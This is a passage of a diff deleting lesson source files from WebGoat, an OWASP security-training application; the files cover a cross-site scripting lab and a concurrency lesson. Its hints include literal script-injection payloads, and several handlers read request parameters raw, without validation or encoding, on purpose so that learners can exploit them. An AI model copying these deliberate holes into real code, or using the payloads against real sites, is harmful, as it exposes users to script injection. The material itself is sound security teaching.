-    }
-
-    /**
-     * Gets the instructions attribute of the WeakAccessControl object
-     * 
-     * @return The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-        String instructions = "For this exercise, your mission is to exploit the concurrency issue which will allow you to purchase merchandise for a lower price.";
-        return (instructions);
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(120);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the AccessControlScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return "Shopping Cart Concurrency Flaw";
-    }
-
-    public Element getCredits()
-    {
-        return super.getCustomCredits("", ASPECT_LOGO);
-    }
-}

src/main/java/org/owasp/webgoat/lessons/CrossSiteScripting/CrossSiteScripting.java

@@ -1,325 +0,0 @@
-
-package org.owasp.webgoat.lessons.CrossSiteScripting;
-
-import java.io.BufferedReader;
-import java.io.FileReader;
-import java.io.IOException;
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.Body;
-import org.apache.ecs.html.Head;
-import org.apache.ecs.html.Html;
-import org.apache.ecs.html.Title;
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.DeleteProfile;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.ListStaff;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.Login;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.Logout;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.SearchStaff;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-import org.owasp.webgoat.util.HtmlEncoder;
-
-
-/**
- * /*******************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- */
-public class CrossSiteScripting extends GoatHillsFinancial
-{
-    private final static Integer DEFAULT_RANKING = new Integer(100);
-
-    public final static String STAGE1 = "Stored XSS";
-
-    public final static String STAGE2 = "Block Stored XSS using Input Validation";
-
-    public final static String STAGE3 = "Stored XSS Revisited";
-
-    public final static String STAGE4 = "Block Stored XSS using Output Encoding";
-
-    public final static String STAGE5 = "Reflected XSS";
-
-    public final static String STAGE6 = "Block Reflected XSS";
-
-    protected void registerActions(String className)
-    {
-        registerAction(new ListStaff(this, className, LISTSTAFF_ACTION));
-        registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION));
-        registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION));
-        registerAction(new EditProfile(this, className, EDITPROFILE_ACTION));
-        registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION));
-
-        // These actions are special in that they chain to other actions.
-        registerAction(new Login(this, className, LOGIN_ACTION, getAction(LISTSTAFF_ACTION)));
-        registerAction(new Logout(this, className, LOGOUT_ACTION, getAction(LOGIN_ACTION)));
-        registerAction(new FindProfile(this, className, FINDPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
-        registerAction(new UpdateProfile(this, className, UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
-        registerAction(new DeleteProfile(this, className, DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION)));
-    }
-
-    /**
-     * Gets the category attribute of the CrossSiteScripting object
-     * 
-     * @return The category value
-     */
-    public Category getDefaultCategory()
-    {
-        return Category.XSS;
-    }
-
-    public String getLessonSolutionFileName(WebSession s)
-    {
-        String solutionFileName = null;
-        String stage = getStage(s);
-        solutionFileName = "/lesson_solutions_1/Lab XSS/Lab " + stage + ".html";
-        return solutionFileName;
-    }
-
-    @Override
-    public String getSolution(WebSession s)
-    {
-        String src = null;
-
-        try
-        {
-            // System.out.println("Solution: " + getLessonSolutionFileName(s));
-            src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonSolutionFileName(s)))),
-                                false);
-        } catch (IOException e)
-        {
-            s.setMessage("Could not find the solution file");
-            src = ("Could not find the solution file");
-        }
-
-        return src;
-    }
-
-    /**
-     * Gets the hints attribute of the DirectoryScreen object
-     * 
-     * @return The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-
-        // Stage 1
-        hints.add("Stage1: You can put HTML tags in form input fields.");
-        hints.add("Stage1: Bury a SCRIPT tag in the field to attack anyone who reads it.");
-        hints
-                .add("Stage1: Enter this: &lt;script language=\"javascript\" type=\"text/javascript\"&gt;alert(\"Ha Ha Ha\");&lt;/script&gt; in message fields.");
-        hints.add("Stage1: Enter this: &lt;script&gt;alert(\"document.cookie\");&lt;/script&gt; in message fields.");
-
-        // Stage 2
-        hints.add("Stage2: Many scripts rely on the use of special characters such as: &lt;");
-        hints
-                .add("Stage2: Allowing only a certain set of characters (positive filtering) is preferred to blocking a set of characters (negative filtering).");
-        hints.add("Stage2: The java.util.regex package is useful for filtering string values.");
-
-        // Stage 3
-        hints
-                .add("Stage3: Browsers recognize and decode HTML entity encoded content after parsing and interpretting HTML tags.");
-        hints.add("Stage3: An HTML entity encoder is provided in the ParameterParser class.");
-
-        // Stage 4
-        hints
-                .add("Stage4: Examine content served in response to form submissions looking for data taken from the form.");
-        hints.add("Stage4: There is a class called HtmlEncoder in org.owasp.webgoat.util");
-        // Stage 5
-        hints
-                .add("Stage5: Validate early.  Consider: out.println(\"Order for \" + request.getParameter(\"product\") + \" being processed...\");");
-
-        return hints;
-    }
-
-    /**
-     * Gets the instructions attribute of the ParameterInjection object
-     * 
-     * @return The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-        String instructions = "";
-
-        if (!getLessonTracker(s).getCompleted())
-        {
-            String stage = getStage(s);
-            if (STAGE1.equals(stage))
-            {
-                instructions = "Stage 1: Execute a Stored Cross Site Scripting (XSS) attack.<br>"
-                        + "As 'Tom', execute a Stored XSS attack against the Street field on the Edit Profile page.  "
-                        + "Verify that 'Jerry' is affected by the attack. <br/>The passwords for the accounts are the lower-case " 
-                        + "versions of their given names (e.g. the password for Tom Cat is \"tom\").";
-            }
-            else if (STAGE2.equals(stage))
-            {
-                instructions = "Stage 2: Block Stored XSS using Input Validation.<br><br>"
-                        + "<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br/><br/>"
-                        + "Implement a fix to block the stored XSS before it can be written to the database. "
-                        + "Repeat stage 1 as 'Eric' with 'David' as the manager.  Verify that 'David' is not affected by the attack.";
-            }
-            else if (STAGE3.equals(stage))
-            {
-                instructions = "Stage 3: Execute a previously Stored Cross Site Scripting (XSS) attack.<br>"
-                        + "The 'Bruce' employee profile is pre-loaded with a stored XSS attack. "
-                        + "Verify that 'David' is affected by the attack even though the fix from stage 2 is in place.";
-            }
-            else if (STAGE4.equals(stage))
-            {
-                instructions = "Stage 4: Block Stored XSS using Output Encoding.<br><br>"
-                        + "<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br/><br/>"
-                        + "Implement a fix to block XSS after it is read from the database. "
-                        + "Repeat stage 3. Verify that 'David' is not affected by Bruce's profile attack.";
-            }
-            else if (STAGE5.equals(stage))
-            {
-                instructions = "Stage 5: Execute a Reflected XSS attack.<br>"
-                        + "Use a vulnerability on the Search Staff page to craft a URL containing a reflected XSS attack.  "
-                        + "Verify that another employee using the link is affected by the attack.";
-            }
-            else if (STAGE6.equals(stage))
-            {
-                instructions = "Stage 6: Block Reflected XSS using Input Validation.<br><br>"
-                        + "<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br/><br/>"
-                        + "Implement a fix to block this reflected XSS attack. "
-                        + "Repeat step 5.  Verify that the attack URL is no longer effective.";
-            }
-        }
-
-        return instructions;
-
-    }
-
-    @Override
-    public String[] getStages()
-    {
-        if (getWebgoatContext().isCodingExercises())
-            return new String[] { STAGE1, STAGE2, STAGE3, STAGE4, STAGE5, STAGE6 };
-        return new String[] { STAGE1, STAGE3, STAGE5 };
-    }
-
-    public void handleRequest(WebSession s)
-    {
-        if (s.getLessonSession(this) == null) s.openLessonSession(this);
-
-        String requestedActionName = null;
-        try
-        {
-            requestedActionName = s.getParser().getStringParameter("action");
-        } catch (ParameterNotFoundException pnfe)
-        {
-            // Let them eat login page.
-            requestedActionName = LOGIN_ACTION;
-        }
-
-        if (requestedActionName != null)
-        {
-            try
-            {
-                LessonAction action = getAction(requestedActionName);
-
-                if (action != null)
-                {
-                    if (!action.requiresAuthentication() || action.isAuthenticated(s))
-                    {
-                        action.handleRequest(s);
-                        // setCurrentAction(s, action.getNextPage(s));
-                    }
-                }
-                else
-                {
-                    setCurrentAction(s, ERROR_ACTION);
-                }
-            } catch (ParameterNotFoundException pnfe)
-            {
-                // System.out.println("Missing parameter");
-                pnfe.printStackTrace();
-                setCurrentAction(s, ERROR_ACTION);
-            } catch (ValidationException ve)
-            {
-                // System.out.println("Validation failed");
-                ve.printStackTrace();
-                setCurrentAction(s, ERROR_ACTION);
-            } catch (UnauthenticatedException ue)
-            {
-                s.setMessage("Login failed");
-                // System.out.println("Authentication failure");
-                ue.printStackTrace();
-            } catch (UnauthorizedException ue2)
-            {
-                s.setMessage("You are not authorized to perform this function");
-                // System.out.println("Authorization failure");
-                ue2.printStackTrace();
-            } catch (Exception e)
-            {
-                // All other errors send the user to the generic error page
-                // System.out.println("handleRequest() error");
-                e.printStackTrace();
-                setCurrentAction(s, ERROR_ACTION);
-            }
-        }
-
-        // All this does for this lesson is ensure that a non-null content exists.
-        setContent(new ElementContainer());
-    }
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the CrossSiteScripting object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return "LAB: Cross Site Scripting";
-    }
-
-    public String htmlEncode(WebSession s, String text)
-    {
-        if (STAGE4.equals(getStage(s)) && text.indexOf("<script>") > -1 && text.indexOf("alert") > -1
-                && text.indexOf("</script>") > -1)
-        {
-            setStageComplete(s, STAGE4);
-            s.setMessage("Welcome to stage 5 -- exploiting the data layer");
-        }
-
-        return HtmlEncoder.encode(text);
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/CrossSiteScripting/EditProfile.java

@@ -1,161 +0,0 @@
-
-package org.owasp.webgoat.lessons.CrossSiteScripting;
-
-import java.sql.PreparedStatement;
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
-import org.owasp.webgoat.session.Employee;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- */
-public class EditProfile extends DefaultLessonAction
-{
-
-    public EditProfile(GoatHillsFinancial lesson, String lessonName, String actionName)
-    {
-        super(lesson, lessonName, actionName);
-    }
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
-            UnauthorizedException
-    {
-        getLesson().setCurrentAction(s, getActionName());
-
-        if (isAuthenticated(s))
-        {
-            int userId = getUserId(s);
-            int employeeId = s.getParser().getIntParameter(CrossSiteScripting.EMPLOYEE_ID);
-
-            Employee employee = getEmployeeProfile(s, userId, employeeId);
-            setSessionAttribute(s, getLessonName() + "." + CrossSiteScripting.EMPLOYEE_ATTRIBUTE_KEY, employee);
-        }
-        else
-            throw new UnauthenticatedException();
-    }
-
-    public String getNextPage(WebSession s)
-    {
-        return CrossSiteScripting.EDITPROFILE_ACTION;
-    }
-
-    public Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId) throws UnauthorizedException
-    {
-        Employee profile = null;
-
-        // Query the database for the profile data of the given employee
-        try
-        {
-            String query = "SELECT * FROM employee WHERE userid = ?";
-
-            try
-            {
-                PreparedStatement answer_statement = WebSession.getConnection(s)
-                        .prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-                answer_statement.setInt(1, subjectUserId);
-                ResultSet answer_results = answer_statement.executeQuery();
-                if (answer_results.next())
-                {
-                    // Note: Do NOT get the password field.
-                    profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
-                            answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
-                                    .getString("title"), answer_results.getString("phone"), answer_results
-                                    .getString("address1"), answer_results.getString("address2"), answer_results
-                                    .getInt("manager"), answer_results.getString("start_date"), answer_results
-                                    .getInt("salary"), answer_results.getString("ccn"), answer_results
-                                    .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
-                                    .getString("disciplined_notes"), answer_results.getString("personal_description"));
-                    /*
-                     * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
-                     * " " + profile.getLastName() + " (" + profile.getId() + ")");
-                     */}
-            } catch (SQLException sqle)
-            {
-                s.setMessage("Error getting employee profile");
-                sqle.printStackTrace();
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error getting employee profile");
-            e.printStackTrace();
-        }
-
-        return profile;
-    }
-
-    public Employee getEmployeeProfile_BACKUP(WebSession s, int userId, int subjectUserId) throws UnauthorizedException
-    {
-        Employee profile = null;
-
-        // Query the database for the profile data of the given employee
-        try
-        {
-            String query = "SELECT * FROM employee WHERE userid = ?";
-
-            try
-            {
-                PreparedStatement answer_statement = WebSession.getConnection(s)
-                        .prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-                answer_statement.setInt(1, subjectUserId);
-                ResultSet answer_results = answer_statement.executeQuery();
-                if (answer_results.next())
-                {
-                    // Note: Do NOT get the password field.
-                    profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
-                            answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
-                                    .getString("title"), answer_results.getString("phone"), answer_results
-                                    .getString("address1"), answer_results.getString("address2"), answer_results
-                                    .getInt("manager"), answer_results.getString("start_date"), answer_results
-                                    .getInt("salary"), answer_results.getString("ccn"), answer_results
-                                    .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
-                                    .getString("disciplined_notes"), answer_results.getString("personal_description"));
-                    /*
-                     * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
-                     * " " + profile.getLastName() + " (" + profile.getId() + ")");
-                     */}
-            } catch (SQLException sqle)
-            {
-                s.setMessage("Error getting employee profile");
-                sqle.printStackTrace();
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error getting employee profile");
-            e.printStackTrace();
-        }
-
-        return profile;
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/CrossSiteScripting/FindProfile.java

@@ -1,220 +0,0 @@
-
-package org.owasp.webgoat.lessons.CrossSiteScripting;
-
-import java.sql.PreparedStatement;
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.util.HashMap;
-import java.util.Map;
-import java.util.regex.Matcher;
-import java.util.regex.Pattern;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
-import org.owasp.webgoat.session.Employee;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- */
-public class FindProfile extends DefaultLessonAction
-{
-
-    private LessonAction chainedAction;
-
-    public FindProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
-    {
-        super(lesson, lessonName, actionName);
-        this.chainedAction = chainedAction;
-    }
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
-            UnauthorizedException, ValidationException
-    {
-        if (isAuthenticated(s))
-        {
-            int userId = getIntSessionAttribute(s, getLessonName() + "." + CrossSiteScripting.USER_ID);
-
-            String searchName = null;
-            try
-            {
-                searchName = getRequestParameter(s, CrossSiteScripting.SEARCHNAME);
-
-                Employee employee = null;
-
-                employee = findEmployeeProfile(s, userId, searchName);
-                if (employee == null)
-                {
-                    setSessionAttribute(s, getLessonName() + "." + CrossSiteScripting.SEARCHRESULT_ATTRIBUTE_KEY,
-                                        "Employee " + searchName + " not found.");
-                }
-            } catch (ValidationException e)
-            {
-                if (CrossSiteScripting.STAGE6.equals(getStage(s)))
-                {
-                    setStageComplete(s, CrossSiteScripting.STAGE6);
-                }
-                throw e;
-            }
-
-            if (CrossSiteScripting.STAGE5.equals(getStage(s)))
-            {
-                if (searchName.indexOf("<script>") > -1 && searchName.indexOf("alert") > -1
-                        && searchName.indexOf("</script>") > -1)
-                {
-                    setStageComplete(s, CrossSiteScripting.STAGE5);
-                }
-            }
-
-            // Execute the chained Action if the employee was found.
-            if (foundEmployee(s))
-            {
-                try
-                {
-                    chainedAction.handleRequest(s);
-                } catch (UnauthenticatedException ue1)
-                {
-                    // System.out.println("Internal server error");
-                    ue1.printStackTrace();
-                } catch (UnauthorizedException ue2)
-                {
-                    // System.out.println("Internal server error");
-                    ue2.printStackTrace();
-                }
-            }
-        }
-        else
-            throw new UnauthenticatedException();
-    }
-
-    public String getNextPage(WebSession s)
-    {
-        String page = CrossSiteScripting.SEARCHSTAFF_ACTION;
-
-        if (foundEmployee(s)) page = CrossSiteScripting.VIEWPROFILE_ACTION;
-
-        return page;
-    }
-
-    protected String getRequestParameter(WebSession s, String name) throws ParameterNotFoundException,
-            ValidationException
-    {
-
-        return s.getParser().getRawParameter(name);
-    }
-
-    protected String getRequestParameter_BACKUP(WebSession s, String name) throws ParameterNotFoundException,
-            ValidationException
-    {
-        return s.getParser().getRawParameter(name);
-    }
-
-    public Employee findEmployeeProfile(WebSession s, int userId, String pattern) throws UnauthorizedException
-    {
-        Employee profile = null;
-
-        // Query the database for the profile data of the given employee
-        try
-        {
-            String query = "SELECT * FROM employee WHERE first_name like ? OR last_name like ?";
-
-            try
-            {
-                PreparedStatement answer_statement = WebSession.getConnection(s)
-                        .prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-                answer_statement.setString(1, "%" + pattern + "%");
-                answer_statement.setString(2, "%" + pattern + "%");
-                ResultSet answer_results = answer_statement.executeQuery();
-
-                // Just use the first hit.
-                if (answer_results.next())
-                {
-                    int id = answer_results.getInt("userid");
-                    // Note: Do NOT get the password field.
-                    profile = new Employee(id, answer_results.getString("first_name"), answer_results
-                            .getString("last_name"), answer_results.getString("ssn"),
-                            answer_results.getString("title"), answer_results.getString("phone"), answer_results
-                                    .getString("address1"), answer_results.getString("address2"), answer_results
-                                    .getInt("manager"), answer_results.getString("start_date"), answer_results
-                                    .getInt("salary"), answer_results.getString("ccn"), answer_results
-                                    .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
-                                    .getString("disciplined_notes"), answer_results.getString("personal_description"));
-
-                    /*
-                     * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
-                     * " " + profile.getLastName() + " (" + profile.getId() + ")");
-                     */
-                    setRequestAttribute(s, getLessonName() + "." + CrossSiteScripting.EMPLOYEE_ID, Integer.toString(id));
-                }
-            } catch (SQLException sqle)
-            {
-                s.setMessage("Error finding employee profile");
-                sqle.printStackTrace();
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error finding employee profile");
-            e.printStackTrace();
-        }
-
-        return profile;
-    }
-
-    private boolean foundEmployee(WebSession s)
-    {
-        boolean found = false;
-        try
-        {
-            getIntRequestAttribute(s, getLessonName() + "." + CrossSiteScripting.EMPLOYEE_ID);
-            found = true;
-        } catch (ParameterNotFoundException e)
-        {
-        }
-
-        return found;
-    }
-
-    protected String validate(final String parameter, final Pattern pattern) throws ValidationException
-    {
-        Matcher matcher = pattern.matcher(parameter);
-        if (!matcher.matches()) throw new ValidationException();
-
-        return parameter;
-    }
-
-    protected static Map<String, Pattern> patterns = new HashMap<String, Pattern>();
-    static
-    {
-        patterns.put(CrossSiteScripting.SEARCHNAME, Pattern.compile("[a-zA-Z ]{0,20}"));
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/CrossSiteScripting/UpdateProfile.java

@@ -1,384 +0,0 @@
-
-package org.owasp.webgoat.lessons.CrossSiteScripting;
-
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.PreparedStatement;
-import java.sql.Statement;
-import java.util.regex.Matcher;
-import java.util.regex.Pattern;
-import javax.servlet.http.HttpServletRequest;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
-import org.owasp.webgoat.session.Employee;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.ParameterParser;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- */
-public class UpdateProfile extends DefaultLessonAction
-{
-
-    private LessonAction chainedAction;
-
-    public UpdateProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
-    {
-        super(lesson, lessonName, actionName);
-        this.chainedAction = chainedAction;
-    }
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
-            UnauthorizedException, ValidationException
-    {
-        if (isAuthenticated(s))
-        {
-            int userId = getIntSessionAttribute(s, getLessonName() + "." + CrossSiteScripting.USER_ID);
-
-            int subjectId = s.getParser().getIntParameter(CrossSiteScripting.EMPLOYEE_ID, 0);
-
-            Employee employee = null;
-            try
-            {
-                employee = parseEmployeeProfile(subjectId, s);
-            } catch (ValidationException e)
-            {
-                if (CrossSiteScripting.STAGE2.equals(getStage(s)))
-                {
-                    setStageComplete(s, CrossSiteScripting.STAGE2);
-                }
-                throw e;
-            }
-
-            if (subjectId > 0)
-            {
-                this.changeEmployeeProfile(s, userId, subjectId, employee);
-                setRequestAttribute(s, getLessonName() + "." + CrossSiteScripting.EMPLOYEE_ID, Integer
-                        .toString(subjectId));
-            }
-            else
-                this.createEmployeeProfile(s, userId, employee);
-
-            try
-            {
-                chainedAction.handleRequest(s);
-            } catch (UnauthenticatedException ue1)
-            {
-                // System.out.println("Internal server error");
-                ue1.printStackTrace();
-            } catch (UnauthorizedException ue2)
-            {
-                // System.out.println("Internal server error");
-                ue2.printStackTrace();
-            }
-        }
-        else
-            throw new UnauthenticatedException();
-    }
-
-    protected Employee parseEmployeeProfile(int subjectId, WebSession s) throws ParameterNotFoundException,
-            ValidationException
-    {
-        // The input validation can be added using a parsing component
-        // or by using an inline regular expression. The parsing component
-        // is the better solution.
-
-        HttpServletRequest request = s.getRequest();
-        String firstName = request.getParameter(CrossSiteScripting.FIRST_NAME);
-        String lastName = request.getParameter(CrossSiteScripting.LAST_NAME);
-        String ssn = request.getParameter(CrossSiteScripting.SSN);
-        String title = request.getParameter(CrossSiteScripting.TITLE);
-        String phone = request.getParameter(CrossSiteScripting.PHONE_NUMBER);
-        String address1 = request.getParameter(CrossSiteScripting.ADDRESS1);
-        String address2 = request.getParameter(CrossSiteScripting.ADDRESS2);
-        int manager = Integer.parseInt(request.getParameter(CrossSiteScripting.MANAGER));
-        String startDate = request.getParameter(CrossSiteScripting.START_DATE);
-        int salary = Integer.parseInt(request.getParameter(CrossSiteScripting.SALARY));
-        String ccn = request.getParameter(CrossSiteScripting.CCN);
-        int ccnLimit = Integer.parseInt(request.getParameter(CrossSiteScripting.CCN_LIMIT));
-        String disciplinaryActionDate = request.getParameter(CrossSiteScripting.DISCIPLINARY_DATE);
-        String disciplinaryActionNotes = request.getParameter(CrossSiteScripting.DISCIPLINARY_NOTES);
-        String personalDescription = request.getParameter(CrossSiteScripting.DESCRIPTION);
-
-        Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone, address1, address2,
-                manager, startDate, salary, ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes,
-                personalDescription);
-
-        return employee;
-    }
-
-    protected Employee parseEmployeeProfile_BACKUP(int subjectId, WebSession s) throws ParameterNotFoundException,
-            ValidationException
-    {
-        // The input validation can be added using a parsing component
-        // or by using an inline regular expression. The parsing component
-        // is the better solution.
-
-        HttpServletRequest request = s.getRequest();
-        String firstName = request.getParameter(CrossSiteScripting.FIRST_NAME);
-        String lastName = request.getParameter(CrossSiteScripting.LAST_NAME);
-        String ssn = request.getParameter(CrossSiteScripting.SSN);
-        String title = request.getParameter(CrossSiteScripting.TITLE);
-        String phone = request.getParameter(CrossSiteScripting.PHONE_NUMBER);
-        String address1 = request.getParameter(CrossSiteScripting.ADDRESS1);
-        String address2 = request.getParameter(CrossSiteScripting.ADDRESS2);
-        int manager = Integer.parseInt(request.getParameter(CrossSiteScripting.MANAGER));
-        String startDate = request.getParameter(CrossSiteScripting.START_DATE);
-        int salary = Integer.parseInt(request.getParameter(CrossSiteScripting.SALARY));
-        String ccn = request.getParameter(CrossSiteScripting.CCN);
-        int ccnLimit = Integer.parseInt(request.getParameter(CrossSiteScripting.CCN_LIMIT));
-        String disciplinaryActionDate = request.getParameter(CrossSiteScripting.DISCIPLINARY_DATE);
-        String disciplinaryActionNotes = request.getParameter(CrossSiteScripting.DISCIPLINARY_NOTES);
-        String personalDescription = request.getParameter(CrossSiteScripting.DESCRIPTION);
-
-        Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone, address1, address2,
-                manager, startDate, salary, ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes,
-                personalDescription);
-
-        return employee;
-    }
-
-    protected Employee doParseEmployeeProfile(int subjectId, ParameterParser parser) throws ParameterNotFoundException,
-            ValidationException
-    {
